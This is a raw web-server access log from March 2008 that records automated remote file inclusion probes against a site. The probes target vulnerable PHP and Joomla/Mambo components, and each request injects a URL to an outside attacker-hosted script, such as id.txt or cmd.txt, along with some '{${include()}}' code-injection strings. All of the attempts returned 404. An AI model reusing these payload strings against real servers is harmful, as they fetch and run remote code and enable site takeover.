222.255.3.68 - - [23/Mar/2008:07:33:58 -0700] "GET /logs/access_080220.log/excelwriter/Writer.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:07:34:58 -0700] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:07:34:59 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:07:34:59 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:35:22 -0700] "GET /logs/access_080131.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:35:23 -0700] "GET /logs/access_080131.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [23/Mar/2008:07:35:34 -0700] "GET /logs/bughttp://www.jef.at/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
207.44.238.63 - - [23/Mar/2008:07:35:35 -0700] "GET /bughttp://www.jef.at/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:07:35:41 -0700] "GET /logs/access_080204.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:07:35:41 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:07:35:41 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:07:36:06 -0700] "GET /logs/access_080215.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:36:30 -0700] "GET /logs/access_080204.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:36:31 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:36:31 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:36:57 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:36:57 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:36:57 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:37:19 -0700] "GET /logs/access_080204.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:37:19 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:37:19 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:37:19 -0700] "GET /logs/access_080204.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:37:19 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:37:20 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:38:15 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:38:15 -0700] "GET //skin/zero_vote/error.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:38:15 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.139.40 - - [23/Mar/2008:07:38:52 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.maak-moet.de/test??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
63.247.139.40 - - [23/Mar/2008:07:38:52 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.maak-moet.de/test??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:39:08 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:39:12 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:39:12 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.184 - - [23/Mar/2008:07:39:18 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/lingaputra/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:07:39:20 -0700] "GET /logs/access_080131.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:07:39:24 -0700] "GET /logs/access_080201.log/admin/store/admin.php?=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:07:39:24 -0700] "GET /admin/store/admin.php?=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:07:39:24 -0700] "GET /logs/admin/store/admin.php?=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.7.194 - - [23/Mar/2008:07:39:32 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [23/Mar/2008:07:39:33 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [23/Mar/2008:07:39:33 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [23/Mar/2008:07:39:44 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:40:04 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.237.162 - - [23/Mar/2008:07:40:08 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.over18.org.uk/test??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
70.84.237.162 - - [23/Mar/2008:07:40:08 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.over18.org.uk/test??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:41:01 -0700] "GET /logs/access_080119.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:41:09 -0700] "GET /logs/access_080131.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.7.194 - - [23/Mar/2008:07:41:12 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:41:17 -0700] "GET /logs/access_080131.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:07:41:18 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:07:41:19 -0700] "GET /config.php?path_to_root=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:07:41:19 -0700] "GET /logs/config.php?path_to_root=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.7.194 - - [23/Mar/2008:07:41:20 -0700] "GET /logs/access.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [23/Mar/2008:07:41:21 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [23/Mar/2008:07:41:22 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:41:30 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:41:30 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:41:31 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:41:33 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.40.17.23 - - [23/Mar/2008:07:41:47 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
84.40.17.23 - - [23/Mar/2008:07:41:47 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
84.40.17.23 - - [23/Mar/2008:07:41:48 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
84.40.17.23 - - [23/Mar/2008:07:41:48 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
84.40.17.23 - - [23/Mar/2008:07:41:48 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
84.40.17.23 - - [23/Mar/2008:07:41:48 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:41:50 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.48.162 - - [23/Mar/2008:07:42:04 -0700] "GET //index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://www.folgoreclan.com/mio/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:07:42:08 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.48.162 - - [23/Mar/2008:07:42:18 -0700] "GET /logs//index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://www.folgoreclan.com/mio/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.239.121.190 - - [23/Mar/2008:07:42:33 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.48.162 - - [23/Mar/2008:07:42:39 -0700] "GET /logs/access_080225.log//index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://www.folgoreclan.com/mio/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.60.207.200 - - [23/Mar/2008:07:42:46 -0700] "GET /errors.php?error=http://www.lieblingshomepage.de/feedbackservice//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [23/Mar/2008:07:43:21 -0700] "GET /logs/errors.php?error=http://www.jef.at/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
207.44.238.63 - - [23/Mar/2008:07:43:21 -0700] "GET /errors.php?error=http://www.jef.at/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:07:43:30 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_linkdirectory&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.10.66 - - [23/Mar/2008:07:43:31 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:07:43:36 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_linkdirectory&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:07:43:38 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_linkdirectory&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.10.66 - - [23/Mar/2008:07:43:49 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.10.66 - - [23/Mar/2008:07:44:17 -0700] "GET /logs/access_080225.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.10.66 - - [23/Mar/2008:07:44:17 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.10.66 - - [23/Mar/2008:07:44:17 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.25.185.132 - - [23/Mar/2008:07:44:24 -0700] "GET //errors.php?error=http://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:07:44:24 -0700] "GET /logs/access_080228.log/index.php?option=com_restaurante&task=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:07:44:25 -0700] "GET /index.php?option=com_restaurante&task=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:07:44:25 -0700] "GET /logs/index.php?option=com_restaurante&task=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.25.185.132 - - [23/Mar/2008:07:44:26 -0700] "GET /logs//errors.php?error=http://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
88.191.48.162 - - [23/Mar/2008:07:44:27 -0700] "GET /logs/access_080312.log//index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://www.folgoreclan.com/mio/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.23.25.238 - - [23/Mar/2008:07:44:39 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.8.154.216 - - [23/Mar/2008:07:45:14 -0700] "GET /logs//config.php?inc_dir=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
213.8.154.216 - - [23/Mar/2008:07:45:14 -0700] "GET //config.php?inc_dir=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
213.8.154.216 - - [23/Mar/2008:07:45:15 -0700] "GET /logs//config.php?inc_dir=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
213.8.154.216 - - [23/Mar/2008:07:45:15 -0700] "GET //config.php?inc_dir=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
213.8.154.216 - - [23/Mar/2008:07:45:16 -0700] "GET /logs//config.php?inc_dir=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
213.8.154.216 - - [23/Mar/2008:07:45:16 -0700] "GET //config.php?inc_dir=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:07:45:21 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_linkdirectory&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:07:45:23 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_linkdirectory&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:07:45:25 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_linkdirectory&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.239.121.190 - - [23/Mar/2008:07:45:29 -0700] "GET //index.php?option=com_custompages&cpage=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:07:45:38 -0700] "GET /logs/access.log/index.php?option=com_restaurante&task=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:07:45:40 -0700] "GET /logs/access_080211.log/admin/store/admin.php?=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:07:45:44 -0700] "GET /logs/access_080228.log/index.php?option=com_restaurante&task=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
